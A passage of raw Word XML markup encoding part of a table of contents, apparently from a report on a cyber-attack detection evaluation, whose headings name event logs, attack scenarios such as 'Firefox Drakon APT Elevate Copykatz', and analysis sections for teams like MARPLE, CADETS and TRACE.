              <w:t>128</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2CA0B4DF" w14:textId="3AE2AF2E" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600153" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.12.4</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log 1</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600153 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>129</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C47A721" w14:textId="4E28A58B" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600154" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.12.5</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log 2</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600154 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>129</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53E367D7" w14:textId="34171261" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600155" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Analysis</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600155 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>132</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56138E8D" w14:textId="31A720C5" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600156" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.1</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TA5.2 Cyber Protection Team</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600156 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>132</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4750A332" w14:textId="40BFFD80" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600157" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.1.1</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>05/08/2019 12:58 -- TA5.2 Windows 2 -- Firefox Drakon APT Sysinfo</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600157 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>132</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B91852F" w14:textId="03E04F16" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600158" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.1.2</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>05/08/2019 14:37 -- TA5.2 Windows 1 -- Firefox Drakon APT Elevate Copykatz 1</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600158 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>133</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18AF5BFB" w14:textId="13597B5B" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600159" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.1.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>05/08/2019 15:14 -- TA5.2 Windows 1 -- Firefox Drakon APT Elevate Copykatz 2</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600159 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>133</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1A68620F" w14:textId="5AF33F86" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600160" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.2</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>MARPLE</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600160 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>134</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3186A3EE" w14:textId="345700EC" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600161" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.2.1</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TA1 FiveDirections</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600161 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>135</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="154BAA12" w14:textId="50FF4FE1" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600162" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.2.2</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TA1 CADETS</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600162 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>136</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12C82864" w14:textId="40F994A3" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600163" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.2.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TA1 TRACE</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600163 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>136</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23C2527B" w14:textId="287B5C95" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600164" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.2.4</w:t>
            </w:r>
